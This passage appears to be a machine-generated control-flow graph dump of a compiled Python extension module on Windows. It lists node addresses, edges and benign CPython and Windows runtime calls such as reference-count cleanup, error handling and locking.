7ff81ecadb93 PyErr_Occurred 11808->11810 11811 7ff81ecadb50 11808->11811 11809->11808 11812 7ff81ecadbb5 11810->11812 11813 7ff81ecadb9e PyErr_SetString 11810->11813 11811->11812 11814 7ff81ecadb8b _Py_Dealloc 11811->11814 11813->11812 11814->11812 11815 7ff81eca93d5 11816 7ff81ecad308 11815->11816 11817 7ff81ecad317 11816->11817 11818 7ff81ecad30e _Py_Dealloc 11816->11818 11819 7ff81ecad32c 11817->11819 11820 7ff81ecad323 _Py_Dealloc 11817->11820 11818->11817 11821 7ff81ecad341 11819->11821 11822 7ff81ecad338 _Py_Dealloc 11819->11822 11820->11819 11823 7ff81ecad35d 11821->11823 11824 7ff81ecad354 _Py_Dealloc 11821->11824 11822->11821 11825 7ff81ecad379 11823->11825 11826 7ff81ecad370 _Py_Dealloc 11823->11826 11824->11823 11827 7ff81ecad395 11825->11827 11828 7ff81ecad38c _Py_Dealloc 11825->11828 11826->11825 11829 7ff81ecad3b1 11827->11829 11830 7ff81ecad3a8 _Py_Dealloc 11827->11830 11828->11827 11831 7ff81ecad3cd 11829->11831 11832 7ff81ecad3c4 _Py_Dealloc 11829->11832 11830->11829 11833 7ff81ecad3e6 11831->11833 11834 7ff81ecad3dd _Py_Dealloc 11831->11834 11832->11831 11835 7ff81ecad3ff 11833->11835 11836 7ff81ecad3f6 _Py_Dealloc 11833->11836 11834->11833 11837 7ff81ecad418 11835->11837 11839 7ff81ecad40f _Py_Dealloc 11835->11839 11836->11835 11838 7ff81ecad431 11837->11838 11840 7ff81ecad428 _Py_Dealloc 11837->11840 11841 7ff81ecad44a 11838->11841 11842 7ff81ecad441 _Py_Dealloc 11838->11842 11839->11837 11840->11838 11843 7ff81ecad463 11841->11843 11844 7ff81ecad45a _Py_Dealloc 11841->11844 11842->11841 11845 7ff81ecad47c 11843->11845 11846 7ff81ecad473 _Py_Dealloc 11843->11846 11844->11843 11847 7ff81ecad495 11845->11847 11849 7ff81ecad48c _Py_Dealloc 11845->11849 11846->11845 11848 7ff81ecad4ae 11847->11848 11850 7ff81ecad4a5 _Py_Dealloc 11847->11850 11851 7ff81ecad4c7 11848->11851 11852 7ff81ecad4be _Py_Dealloc 11848->11852 11849->11847 11850->11848 11853 7ff81ecad4e3 11851->11853 11854 7ff81ecad4da _Py_Dealloc 11851->11854 11852->11851 11855 7ff81ecad4ff 11853->11855 11856 7ff81ecad4f6 _Py_Dealloc 11853->11856 11854->11853 11857 7ff81ecad51b 11855->11857 11858 7ff81ecad512 _Py_Dealloc 11855->11858 11856->11855 11859 7ff81ecad537 11857->11859 11860 7ff81ecad52e _Py_Dealloc 11857->11860 11858->11857 11861 7ff81ecad553 11859->11861 11862 7ff81ecad54a _Py_Dealloc 11859->11862 11860->11859 11863 7ff81ecad56f 11861->11863 11864 7ff81ecad566 _Py_Dealloc 11861->11864 11862->11861 11865 7ff81ecad58b 11863->11865 11866 7ff81ecad582 _Py_Dealloc 11863->11866 11864->11863 11867 7ff81ecad5a7 11865->11867 11868 7ff81ecad59e _Py_Dealloc 11865->11868 11866->11865 11869 7ff81ecad5c3 11867->11869 11871 7ff81ecad5ba _Py_Dealloc 11867->11871 11868->11867 11870 7ff81ecad5df 11869->11870 11872 7ff81ecad5d6 _Py_Dealloc 11869->11872 11873 7ff81ecad5fb 11870->11873 11874 7ff81ecad5f2 _Py_Dealloc 11870->11874 11871->11869 11872->11870 11875 7ff81ecad617 11873->11875 11876 7ff81ecad60e _Py_Dealloc 11873->11876 11874->11873 11877 7ff81ecad633 11875->11877 11878 7ff81ecad62a _Py_Dealloc 11875->11878 11876->11875 11879 7ff81ecad64f 11877->11879 11881 7ff81ecad646 _Py_Dealloc 11877->11881 11878->11877 11880 7ff81ecad66b 11879->11880 11882 7ff81ecad662 _Py_Dealloc 11879->11882 11883 7ff81ecad687 11880->11883 11884 7ff81ecad67e _Py_Dealloc 11880->11884 11881->11879 11882->11880 11885 7ff81ecad6a3 11883->11885 11886 7ff81ecad69a _Py_Dealloc 11883->11886 11884->11883 11887 7ff81ecad6bf 11885->11887 11888 7ff81ecad6b6 _Py_Dealloc 11885->11888 11886->11885 11889 7ff81ecad6db 11887->11889 11890 7ff81ecad6d2 _Py_Dealloc 11887->11890 11888->11887 11891 7ff81ecad6f7 11889->11891 11892 7ff81ecad6ee _Py_Dealloc 11889->11892 11890->11889 11893 7ff81ecad713 11891->11893 11894 7ff81ecad70a _Py_Dealloc 11891->11894 11892->11891 11895 7ff81ecad72f 11893->11895 11896 7ff81ecad726 _Py_Dealloc 11893->11896 11894->11893 11897 7ff81ecad74b 11895->11897 11898 7ff81ecad742 _Py_Dealloc 11895->11898 11896->11895 11899 7ff81ecad75e _Py_Dealloc 11897->11899 11900 7ff81ecad767 11897->11900 11898->11897 11899->11900 11901 7ff81ecad783 11900->11901 11903 7ff81ecad77a _Py_Dealloc 11900->11903 11902 7ff81ecad79f 11901->11902 11904 7ff81ecad796 _Py_Dealloc 11901->11904 11905 7ff81ecad7bb 11902->11905 11906 7ff81ecad7b2 _Py_Dealloc 11902->11906 11903->11901 11904->11902 11907 7ff81ecad7d7 11905->11907 11908 7ff81ecad7ce _Py_Dealloc 11905->11908 11906->11905 11909 7ff81ecad7f3 11907->11909 11910 7ff81ecad7ea _Py_Dealloc 11907->11910 11908->11907 11911 7ff81ecad80f 11909->11911 11913 7ff81ecad806 _Py_Dealloc 11909->11913 11910->11909 11912 7ff81ecad82b 11911->11912 11914 7ff81ecad822 _Py_Dealloc 11911->11914 11915 7ff81ecad847 11912->11915 11916 7ff81ecad83e _Py_Dealloc 11912->11916 11913->11911 11914->11912 11917 7ff81ecad863 11915->11917 11918 7ff81ecad85a _Py_Dealloc 11915->11918 11916->11915 11919 7ff81ecad87f 11917->11919 11920 7ff81ecad876 _Py_Dealloc 11917->11920 11918->11917 11921 7ff81ecad89b 11919->11921 11922 7ff81ecad892 _Py_Dealloc 11919->11922 11920->11919 11923 7ff81ecad8b7 11921->11923 11924 7ff81ecad8ae _Py_Dealloc 11921->11924 11922->11921 11925 7ff81ecad8d3 11923->11925 11926 7ff81ecad8ca _Py_Dealloc 11923->11926 11924->11923 11927 7ff81ecad8ef 11925->11927 11928 7ff81ecad8e6 _Py_Dealloc 11925->11928 11926->11925 11929 7ff81ecad90b 11927->11929 11930 7ff81ecad902 _Py_Dealloc 11927->11930 11928->11927 11931 7ff81ecad927 11929->11931 11932 7ff81ecad91e _Py_Dealloc 11929->11932 11930->11929 11933 7ff81ecad943 11931->11933 11935 7ff81ecad93a _Py_Dealloc 11931->11935 11932->11931 11934 7ff81ecad95f 11933->11934 11936 7ff81ecad956 _Py_Dealloc 11933->11936 11937 7ff81ecad97b 11934->11937 11938 7ff81ecad972 _Py_Dealloc 11934->11938 11935->11933 11936->11934 11939 7ff81ecad997 11937->11939 11940 7ff81ecad98e _Py_Dealloc 11937->11940 11938->11937 11941 7ff81ecad9b3 11939->11941 11942 7ff81ecad9aa _Py_Dealloc 11939->11942 11940->11939 11943 7ff81ecad9cf 11941->11943 11945 7ff81ecad9c6 _Py_Dealloc 11941->11945 11942->11941 11944 7ff81ecad9eb 11943->11944 11946 7ff81ecad9e2 _Py_Dealloc 11943->11946 11947 7ff81ecada07 11944->11947 11948 7ff81ecad9fe _Py_Dealloc 11944->11948 11945->11943 11946->11944 11949 7ff81ecada23 11947->11949 11950 7ff81ecada1a _Py_Dealloc 11947->11950 11948->11947 11951 7ff81ecada3f 11949->11951 11952 7ff81ecada36 _Py_Dealloc 11949->11952 11950->11949 11953 7ff81ecada5b 11951->11953 11954 7ff81ecada52 _Py_Dealloc 11951->11954 11952->11951 11955 7ff81ecada77 11953->11955 11956 7ff81ecada6e _Py_Dealloc 11953->11956 11954->11953 11957 7ff81ecada93 11955->11957 11958 7ff81ecada8a _Py_Dealloc 11955->11958 11956->11955 11959 7ff81ecadaaf 11957->11959 11960 7ff81ecadaa6 _Py_Dealloc 11957->11960 11958->11957 11961 7ff81ecadacb 11959->11961 11962 7ff81ecadac2 _Py_Dealloc 11959->11962 11960->11959 11963 7ff81ecadae7 11961->11963 11964 7ff81ecadade _Py_Dealloc 11961->11964 11962->11961 11965 7ff81ecadb03 11963->11965 11967 7ff81ecadafa _Py_Dealloc 11963->11967 11964->11963 11966 7ff81ecadb1f 11965->11966 11968 7ff81ecadb16 _Py_Dealloc 11965->11968 11969 7ff81ecadb46 11966->11969 11970 7ff81ecadb2a _Py_Dealloc 11966->11970 11967->11965 11968->11966 11971 7ff81ecadb93 PyErr_Occurred 11969->11971 11972 7ff81ecadb50 11969->11972 11970->11969 11973 7ff81ecadbb5 11971->11973 11974 7ff81ecadb9e PyErr_SetString 11971->11974 11972->11973 11975 7ff81ecadb8b _Py_Dealloc 11972->11975 11974->11973 11975->11973 14520 7ff81df02a70 14523 7ff81df02b4f 14520->14523 14521 7ff81df4ebe0 6 API calls 14522 7ff81df02f6d 14521->14522 14523->14521 14909 7ff81ec51050 14910 7ff81ec51060 14909->14910 14911 7ff81ec5107f 14910->14911 14912 7ff81ec5109e _Py_Dealloc 14910->14912 14913 7ff81ec51096 14911->14913 14914 7ff81ec510a6 _Py_Dealloc 14911->14914 14912->14911 14914->14913 14915 7ff81ec61050 PyImport_ImportModule 14916 7ff81ec6106d 14915->14916 14917 7ff81ec61066 14915->14917 14918 7ff81ec6107c PyCapsule_Import 14916->14918 14919 7ff81ec61073 _Py_Dealloc 14916->14919 14918->14917 14919->14918 14920 7ff81ec5243c 14921 7ff81ec5245e _PyArg_UnpackKeywords 14920->14921 14922 7ff81ec52450 14920->14922 14923 7ff81ec524ae 14921->14923 14924 7ff81ec524a3 14921->14924 14922->14921 14922->14924 14925 7ff81ec523f8 2 API calls 14924->14925 14925->14923 12298 7ff81ec993c0 12299 7ff81ec993d1 12298->12299 12301 7ff81ec99403 12298->12301 12300 7ff81ec993da PyErr_Format 12299->12300 12299->12301 12302 7ff81ec9940d 12300->12302 12301->12302 12303 7ff81ec99438 _Py_Dealloc 12301->12303 12303->12302 12304 7ff81ec9e3c0 12305 7ff81ec9e44f PyErr_Format 12304->12305 12307 7ff81ec9eb46 12305->12307 12308 7ff81ecaffc0 12309 7ff81ecb0002 12308->12309 12310 7ff81ecb001f 12308->12310 12311 7ff81ecb0011 PyObject_GetAttr 12309->12311 12312 7ff81ecb0007 12309->12312 12313 7ff81ecb003a _PyType_Lookup 12310->12313 12314 7ff81ecb0029 PyType_Ready 12310->12314 12311->12312 12316 7ff81ecb014b 12312->12316 12327 7ff81ecb0142 _Py_Dealloc 12312->12327 12315 7ff81ecb008a _PyObject_GetDictPtr 12313->12315 12320 7ff81ecb004e 12313->12320 12314->12313 12314->12316 12317 7ff81ecb00f2 12315->12317 12318 7ff81ecb0098 12315->12318 12317->12316 12325 7ff81ecb015a 12317->12325 12326 7ff81ecb0080 12317->12326 12318->12317 12321 7ff81ecb00a0 _PyDict_GetItem_KnownHash 12318->12321 12319 7ff81ecb0082 12319->12315 12320->12315 12320->12319 12322 7ff81ecb0073 PyDescr_IsData 12320->12322 12323 7ff81ecb00e3 12321->12323 12324 7ff81ecb00bb 12321->12324 12322->12315 12322->12326 12323->12317 12331 7ff81ecb00e9 _Py_Dealloc 12323->12331 12328 7ff81ecb00c4 _Py_Dealloc 12324->12328 12329 7ff81ecb00cd 12324->12329 12325->12316 12330 7ff81ecb0164 PyErr_Format 12325->12330 12326->12312 12332 7ff81ecb0114 _Py_Dealloc 12326->12332 12327->12316 12328->12329 12329->12312 12333 7ff81ecb00d8 _Py_Dealloc 12329->12333 12330->12316 12331->12317 12332->12312 12333->12312 12334 7ff81ecadfc0 PyErr_Format 12501 7ff81df4ed08 12504 7ff81df4ed1c IsProcessorFeaturePresent 12501->12504 12505 7ff81df4ed3b capture_current_context 12504->12505 12506 7ff81df4ed33 12504->12506 12509 7ff81df4ec00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12505->12509 12506->12505 12510 7ff81ec9ebc4 12512 7ff81ec9ebd6 12510->12512 12511 7ff81ec9faf3 12512->12511 12513 7ff81ec9eca3 12512->12513 12514 7ff81ec9ec6e PyErr_Format 12512->12514 12516 7ff81ec9ecf6 12513->12516 12517 7ff81ec9ece1 PyUnicode_Decode 12513->12517 12518 7ff81ec9eccf PyUnicode_DecodeUTF8 12513->12518 12515 7ff81ec9ed06 12514->12515 12521 7ff81ec9fab1 12515->12521 12524 7ff81ec9faa8 _Py_Dealloc 12515->12524 12516->12515 12519 7ff81ec9ed30 12516->12519 12520 7ff81ec9ed2a _Py_Dealloc 12516->12520 12517->12516 12518->12516 12522 7ff81ec9ed73 12519->12522 12523 7ff81ec9ed4c PyErr_SetString 12519->12523 12520->12519 12525 7ff81ec9fac9 12521->12525 12528 7ff81ec9fac0 _Py_Dealloc 12521->12528 12526 7ff81ec9eda0 12522->12526 12527 7ff81ec9ed97 _Py_Dealloc 12522->12527 12553 7ff81ec9ed7e 12522->12553 12523->12553 12524->12521 12530 7ff81ec9fae1 12525->12530 12533 7ff81ec9fad8 _Py_Dealloc 12525->12533 12531 7ff81ec9eea4 12526->12531 12532 7ff81ec9edae 12526->12532 12527->12526 12528->12525 12529 7ff81ec9f896 _Py_Dealloc 12606 7ff81ec9f682 12529->12606 12537 7ff81ec9eecd 12531->12537 12538 7ff81ec9eebc _PyUnicode_Ready 12531->12538 12569 7ff81ec9eed3 12531->12569 12534 7ff81ec9edd1 PyObject_GetAttr 12532->12534 12542 7ff81ec9edcc 12532->12542 12533->12530 12534->12542 12535 7ff81ec9f8aa _Py_Dealloc 12600 7ff81ec9f3aa 12535->12600 12536 7ff81ec9f8c8 PyErr_GetExcInfo PyErr_SetExcInfo 12547 7ff81ec9f8f8 12536->12547 12544 7ff81ec9ef45 PyErr_SetString 12537->12544 12537->12569 12538->12537 12543 7ff81ec9eddf 12538->12543 12539 7ff81ec9f8bf _Py_Dealloc 12539->12536 12540 7ff81ec9eef4 12548 7ff81ec9ef04 PyErr_Format 12540->12548 12549 7ff81ec9ef7f PyUnicode_Find 12540->12549 12541 7ff81ec9f7ce PyTuple_New 12541->12543 12546 7ff81ec9f804 PyDict_New 12541->12546 12542->12543 12545 7ff81ec9ee02 PyDict_New 12542->12545 12543->12536 12544->12543 12551 7ff81ec9ee20 PyDict_SetItem 12545->12551 12545->12553 12552 7ff81ec9f830 PyDict_SetItem 12546->12552 12546->12553 12554 7ff81ec9f8fc PyErr_Fetch 12547->12554 12555 7ff81ec9f90e PyByteArray_Resize 12547->12555 12548->12536 12549->12543 12550 7ff81ec9efc6 12549->12550 12558 7ff81ec9efd0 12550->12558 12559 7ff81ec9f1bc 12550->12559 12551->12553 12560 7ff81ec9ee4b PyDict_SetItem 12551->12560 12552->12553 12561 7ff81ec9ee76 12552->12561 12553->12529 12553->12606 12554->12555 12556 7ff81ec9f9a0 12555->12556 12557 7ff81ec9f92c PyErr_SetExcInfo 12555->12557 12567 7ff81ec9f9a6 _Py_Dealloc 12556->12567 12568 7ff81ec9f9af PyErr_SetExcInfo PyErr_Restore 12556->12568 12562 7ff81ec9f965 12557->12562 12563 7ff81ec9f959 12557->12563 12564 7ff81ec9eff5 PyErr_Format 12558->12564 12565 7ff81ec9f036 PyUnicode_Find 12558->12565 12566 7ff81ec9f1cc PyErr_SetString 12559->12566 12578 7ff81ec9f206 12559->12578 12560->12553 12560->12561 12561->12553 12573 7ff81ec9f9e1 12561->12573 12571 7ff81ec9f97e 12562->12571 12574 7ff81ec9f978 _Py_Dealloc 12562->12574 12563->12562 12570 7ff81ec9f95f _Py_Dealloc 12563->12570 12564->12536 12565->12543 12572 7ff81ec9f07d 12565->12572 12566->12536 12567->12568 12568->12515 12569->12540 12569->12541 12569->12543 12570->12562 12575 7ff81ec9f997 12571->12575 12576 7ff81ec9f991 _Py_Dealloc 12571->12576 12577 7ff81ec9f0b6 PyErr_SetString 12572->12577 12591 7ff81ec9f0f0 12572->12591 12616 7ff81ec9f082 12572->12616 12579 7ff81ec9f9f1 12573->12579 12580 7ff81ec9f9e8 _Py_Dealloc 12573->12580 12574->12571 12575->12515 12588 7ff81ec9fa51 _Py_Dealloc 12575->12588 12576->12575 12577->12536 12578->12543 12583 7ff81ec9f28d PyLong_FromLong 12578->12583 12584 7ff81ec9f24c PyErr_Format 12578->12584 12581 7ff81ec9fa00 12579->12581 12582 7ff81ec9f9f7 _Py_Dealloc 12579->12582 12580->12579 12586 7ff81ec9fa13 PyByteArray_Resize 12581->12586 12587 7ff81ec9fa0d _Py_Dealloc 12581->12587 12582->12581 12583->12543 12585 7ff81ec9f2c2 12583->12585 12584->12536 12592 7ff81ec9f2d3 12585->12592 12593 7ff81ec9f367 PyNumber_Index 12585->12593 12586->12575 12594 7ff81ec9fa71 12586->12594 12587->12586 12588->12515 12589 7ff81ec9f604 12589->12543 12596 7ff81ec9f63a PyDict_New 12589->12596 12590 7ff81ec9f609 PyObject_GetAttr 12590->12589 12591->12543 12595 7ff81ec9f139 PyErr_SetString 12591->12595 12591->12616 12597 7ff81ec9f2e8 12592->12597 12602 7ff81ec9f359 PyLong_AsSsize_t 12592->12602 12593->12597 12598 7ff81ec9f37e PyLong_AsSsize_t 12593->12598 12594->12515 12599 7ff81ec9fa77 _Py_Dealloc 12594->12599 12595->12536 12596->12600 12601 7ff81ec9f66b PyDict_SetItem 12596->12601 12603 7ff81ec9f39f PyErr_Occurred 12597->12603 12605 7ff81ec9f3cd 12597->12605 12598->12597 12604 7ff81ec9f390 _Py_Dealloc 12598->12604 12599->12515 12600->12536 12600->12539 12601->12606 12607 7ff81ec9f6a5 PyDict_SetItem 12601->12607 12602->12597 12603->12600 12603->12605 12604->12597 12608 7ff81ec9f3d4 _Py_Dealloc 12605->12608 12609 7ff81ec9f3dd PyUnicode_Find 12605->12609 12606->12535 12606->12600 12607->12606 12610 7ff81ec9f6df PyDict_SetItem 12607->12610 12608->12609 12609->12543 12611 7ff81ec9f435 12609->12611 12610->12606 12612 7ff81ec9f719 PyDict_SetItem 12610->12612 12613 7ff81ec9f445 12611->12613 12614 7ff81ec9f4db 12611->12614 12612->12606 12615 7ff81ec9f757 12612->12615 12613->12616 12617 7ff81ec9f44e PyErr_SetString 12613->12617 12618 7ff81ec9f4e4 PyErr_SetString 12614->12618 12622 7ff81ec9f51e 12614->12622 12615->12606 12619 7ff81ec9f794 12615->12619 12616->12543 12616->12589 12616->12590 12617->12536 12618->12536 12620 7ff81ec9f7a4 12619->12620 12621 7ff81ec9f79b _Py_Dealloc 12619->12621 12623 7ff81ec9f7b3 12620->12623 12624 7ff81ec9f7aa _Py_Dealloc 12620->12624 12621->12620 12622->12543 12622->12616 12625 7ff81ec9f56b PyErr_SetString 12622->12625 12626 7ff81ec9f7c0 _Py_Dealloc 12623->12626 12627 7ff81ec9f7c6 12623->12627 12624->12623 12625->12536 12626->12627 12627->12586 12789 7ff81ecb27ba 12791 7ff81ecb27c6 12789->12791 12790 7ff81ecb53fc abort 12791->12790 12792 7ff81ecb27fd 12791->12792 12793 7ff81df2e710 EnterCriticalSection 12794 7ff81df2e7dd LeaveCriticalSection 12793->12794 12795 7ff81df2e744 12793->12795 12796 7ff81df2e806 malloc 12794->12796 12798 7ff81df2e7fa 12794->12798 12797 7ff81df2e790 LeaveCriticalSection 12795->12797 12799 7ff81df2e7a3 12795->12799 12796->12798 12797->12798 12799->12794 12800 7ff81df2e7cb 12799->12800 12801 7ff81df2e7d7 free 12799->12801 12800->12794 12801->12794 12802 7ff81df31110 12803 7ff81df3112d EnterCriticalSection 12802->12803 12804 7ff81df31231 12802->12804 12806 7ff81df31140 12803->12806 12805 7ff81df3121f LeaveCriticalSection 12805->12804 12806->12805 12807 7ff81df31200 SleepConditionVariableCS 12806->12807 12807->12806 14524 7ff81ec51140 PyModuleDef_Init 12978 7ff81ecadbf0 12979 7ff81ecadc03 PyObject_GetAttr 12978->12979 12980 7ff81ecadc00 12978->12980 12980->12979 13144 7ff81df31b20 13146 7ff81df31b43 13144->13146 13145 7ff81df31b48 13146->13145 13147 7ff81df31bfe memmove 13146->13147 13147->13145 14927 7ff81ec81470 14928 7ff81ec8157d 14927->14928 14934 7ff81ec814a6 14927->14934 14929 7ff81ec81583 PyErr_Format 14928->14929 14944 7ff81ec8155e 14928->14944 14941 7ff81ec81557 14929->14941 14930 7ff81ec814d7 PyDict_Size 14931 7ff81ec814f3 _PyDict_GetItem_KnownHash 14930->14931 14936 7ff81ec814eb 14930->14936 14931->14929 14931->14936 14932 7ff81ec82840 27 API calls 14937 7ff81ec815e4 14932->14937 14934->14929 14934->14930 14935 7ff81ec81517 _PyDict_GetItem_KnownHash 14938 7ff81ec814f1 14935->14938 14939 7ff81ec81568 14935->14939 14936->14935 14936->14938 14938->14944 14945 7ff81ec82310 PyDict_Next 14938->14945 14958 7ff81ec822c0 PyErr_Format 14939->14958 14941->14932 14943 7ff81ec81553 14943->14941 14943->14944 14959 7ff81ec81630 14944->14959 14946 7ff81ec824b3 14945->14946 14949 7ff81ec82368 14945->14949 14946->14943 14947 7ff81ec824fa PyErr_Format 14948 7ff81ec82518 14947->14948 14948->14943 14949->14947 14950 7ff81ec82493 PyDict_Next 14949->14950 14953 7ff81ec823d6 PyUnicode_Compare 14949->14953 14956 7ff81ec8240a 14949->14956 14950->14946 14950->14949 14951 7ff81ec82459 PyErr_Format 14951->14943 14953->14949 14954 7ff81ec823e5 PyErr_Occurred 14953->14954 14954->14948 14954->14949 14955 7ff81ec82429 PyUnicode_Compare 14955->14956 14957 7ff81ec82438 PyErr_Occurred 14955->14957 14956->14951 14956->14955 14957->14948 14957->14956 14958->14941 14960 7ff81ec8169f 14959->14960 14961 7ff81ec8165c PyObject_Size 14959->14961 14964 7ff81ec816e3 14960->14964 14985 7ff81ec82530 14960->14985 14962 7ff81ec8166b 14961->14962 14963 7ff81ec81679 14961->14963 14970 7ff81ec82840 27 API calls 14962->14970 14963->14960 14967 7ff81ec8167f PyErr_SetNone 14963->14967 14965 7ff81ec8170c 14964->14965 14966 7ff81ec816f3 PyType_IsSubtype 14964->14966 14965->14962 14971 7ff81ec81741 PyObject_Size 14965->14971 14975 7ff81ec8173b _Py_Dealloc 14965->14975 14966->14965 14969 7ff81ec816fd 14966->14969 14967->14962 14973 7ff81ec82530 12 API calls 14969->14973 14974 7ff81ec817ec 14970->14974 14971->14962 14976 7ff81ec8175e 14971->14976 14973->14965 14981 7ff81ec818a4 14974->14981 14982 7ff81ec8189b _Py_Dealloc 14974->14982 14975->14971 14977 7ff81ec817a3 PyByteArray_AsString 14976->14977 14979 7ff81ec81774 PyErr_Format 14976->14979 14977->14962 14980 7ff81ec817bf PyBytes_AsString 14977->14980 14978 7ff81ec816dd _Py_Dealloc 14978->14964 14979->14962 14980->14962 14980->14974 14983 7ff81ec818bd 14981->14983 14984 7ff81ec818b4 _Py_Dealloc 14981->14984 14982->14981 14983->14937 14984->14983 14986 7ff81ec8255a PyType_IsSubtype 14985->14986 14987 7ff81ec82564 14985->14987 14986->14987 14988 7ff81ec825da PyTuple_New 14986->14988 14987->14988 14989 7ff81ec82570 Py_EnterRecursiveCall 14987->14989 14991 7ff81ec816be 14988->14991 14992 7ff81ec825f4 14988->14992 14989->14991 14993 7ff81ec82597 Py_LeaveRecursiveCall 14989->14993 14991->14962 14991->14964 14991->14978 14994 7ff81ec8260c PyObject_Call 14992->14994 14995 7ff81ec82620 Py_EnterRecursiveCall 14992->14995 14993->14991 15001 7ff81ec825ae PyErr_Occurred 14993->15001 14996 7ff81ec82631 14994->14996 14995->14996 14997 7ff81ec82635 Py_LeaveRecursiveCall 14995->14997 14996->14991 14999 7ff81ec82676 _Py_Dealloc 14996->14999 14997->14996 15002 7ff81ec8264e PyErr_Occurred 14997->15002 14999->14991 15001->14991 15003 7ff81ec825b9 PyErr_SetString 15001->15003 15002->14996 15004 7ff81ec82659 PyErr_SetString 15002->15004 15003->14991 15004->14996 14592 7ff81ec522dc 14593 7ff81ec522e5 PyErr_SetString 14592->14593 14594 7ff81ec52300 14592->14594 14593->14594 13647 7ff81eca27e0 PyErr_GetExcInfo 13648 7ff81eca2842 13647->13648 13649 7ff81eca2993 13648->13649 13650 7ff81eca284b PyErr_ExceptionMatches 13648->13650 13651 7ff81eca29a2 PyErr_SetExcInfo 13649->13651 13652 7ff81eca2999 _Py_Dealloc 13649->13652 13653 7ff81eca28c3 PyErr_SetExcInfo 13650->13653 13662 7ff81eca2876 13650->13662 13660 7ff81eca2911 13651->13660 13652->13651 13654 7ff81eca28e9 13653->13654 13655 7ff81eca28da 13653->13655 13656 7ff81eca28fd 13654->13656 13659 7ff81eca28f4 _Py_Dealloc 13654->13659 13655->13654 13658 7ff81eca28e0 _Py_Dealloc 13655->13658 13656->13660 13663 7ff81eca2908 _Py_Dealloc 13656->13663 13657 7ff81eca29e1 13658->13654 13659->13656 13660->13657 13661 7ff81eca29d8 _Py_Dealloc 13660->13661 13661->13657 13664 7ff81eca2930 13662->13664 13665 7ff81eca28a8 13662->13665 13663->13660 13666 7ff81eca2941 _Py_Dealloc 13664->13666 13667 7ff81eca2947 13664->13667 13665->13653 13666->13667 13668 7ff81eca2958 _Py_Dealloc 13667->13668 13669 7ff81eca295e 13667->13669 13668->13669 13670 7ff81eca2964 _Py_Dealloc 13669->13670 13671 7ff81eca296d 13669->13671 13670->13671 13672 7ff81eca2977 _Py_Dealloc 13671->13672 13673 7ff81eca297d 13671->13673 13672->13673 13674 7ff81eca2983 _Py_Dealloc 13673->13674 13675 7ff81eca298c 13673->13675 13674->13675 13675->13651 15005 7ff81dee2940 EnterCriticalSection 15010 7ff81dee296f 15005->15010 15006 7ff81dee299f 15007 7ff81dee29e1 LeaveCriticalSection 15006->15007 15009 7ff81dee29a8 WakeConditionVariable 15006->15009 15008 7ff81dee297c SleepConditionVariableCS 15008->15010 15009->15007 15010->15006 15010->15007 15010->15008 13676 7ff81df034c0 13678 7ff81df0359d 13676->13678 13680 7ff81df4ebe0 13678->13680 13681 7ff81df4ebe9 13680->13681 13682 7ff81df03a2d 13681->13682 13683 7ff81df4ec34 IsProcessorFeaturePresent 13681->13683 13684 7ff81df4ec4c 13683->13684 13685 7ff81df4ec53 capture_previous_context 13683->13685 13684->13685 13688 7ff81df4ec00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13685->13688 13689 7ff81eca7bd8 13690 7ff81ecadb3f 13689->13690 13691 7ff81ecadb93 PyErr_Occurred 13690->13691 13692 7ff81ecadb50 13690->13692 13693 7ff81ecadbb5 13691->13693 13694 7ff81ecadb9e PyErr_SetString 13691->13694 13692->13693 13695 7ff81ecadb8b _Py_Dealloc 13692->13695 13694->13693 13695->13693 14020 7ff81eca83df 14021 7ff81ecad2ed 14020->14021 14022 7ff81ecad303 14021->14022 14023 7ff81ecad2fa _Py_Dealloc 14021->14023 14024 7ff81ecad317 14022->14024 14025 7ff81ecad30e _Py_Dealloc 14022->14025 14023->14022 14026 7ff81ecad32c 14024->14026 14027 7ff81ecad323 _Py_Dealloc 14024->14027 14025->14024 14028 7ff81ecad341 14026->14028 14029 7ff81ecad338 _Py_Dealloc 14026->14029 14027->14026 14030 7ff81ecad35d 14028->14030 14031 7ff81ecad354 _Py_Dealloc 14028->14031 14029->14028 14032 7ff81ecad379 14030->14032 14033 7ff81ecad370 _Py_Dealloc 14030->14033 14031->14030 14034 7ff81ecad395 14032->14034 14035 7ff81ecad38c _Py_Dealloc 14032->14035 14033->14032 14036 7ff81ecad3b1 14034->14036 14037 7ff81ecad3a8 _Py_Dealloc 14034->14037 14035->14034 14038 7ff81ecad3cd 14036->14038 14039 7ff81ecad3c4 _Py_Dealloc 14036->14039 14037->14036 14040 7ff81ecad3e6 14038->14040 14041 7ff81ecad3dd _Py_Dealloc 14038->14041 14039->14038 14042 7ff81ecad3ff 14040->14042 14043 7ff81ecad3f6 _Py_Dealloc 14040->14043 14041->14040 14044 7ff81ecad418 14042->14044 14046 7ff81ecad40f _Py_Dealloc 14042->14046 14043->14042 14045 7ff81ecad431 14044->14045 14047 7ff81ecad428 _Py_Dealloc 14044->14047 14048 7ff81ecad44a 14045->14048 14049 7ff81ecad441 _Py_Dealloc 14045->14049 14046->14044 14047->14045 14050 7ff81ecad463 14048->14050 14051 7ff81ecad45a _Py_Dealloc 14048->14051 14049->14048 14052 7ff81ecad47c 14050->14052 14053 7ff81ecad473 _Py_Dealloc 14050->14053 14051->14050 14054 7ff81ecad495 14052->14054 14056 7ff81ecad48c _Py_Dealloc 14052->14056 14053->14052 14055 7ff81ecad4ae 14054->14055 14057 7ff81ecad4a5 _Py_Dealloc 14054->14057 14058 7ff81ecad4c7 14055->14058 14059 7ff81ecad4be _Py_Dealloc 14055->14059 14056->14054 14057->14055 14060 7ff81ecad4e3 14058->14060 14061 7ff81ecad4da _Py_Dealloc 14058->14061 14059->14058 14062 7ff81ecad4ff 14060->14062 14063 7ff81ecad4f6 _Py_Dealloc 14060->14063 14061->14060 14064 7ff81ecad51b 14062->14064 14065 7ff81ecad512 _Py_Dealloc 14062->14065 14063->14062 14066 7ff81ecad537 14064->14066 14067 7ff81ecad52e _Py_Dealloc 14064->14067 14065->14064 14068 7ff81ecad553 14066->14068 14069 7ff81ecad54a _Py_Dealloc 14066->14069 14067->14066 14070 7ff81ecad56f 14068->14070 14071 7ff81ecad566 _Py_Dealloc 14068->14071 14069->14068 14072 7ff81ecad58b 14070->14072 14073 7ff81ecad582 _Py_Dealloc 14070->14073 14071->14070 14074 7ff81ecad5a7 14072->14074 14075 7ff81ecad59e _Py_Dealloc 14072->14075 14073->14072 14076 7ff81ecad5c3 14074->14076 14078 7ff81ecad5ba _Py_Dealloc 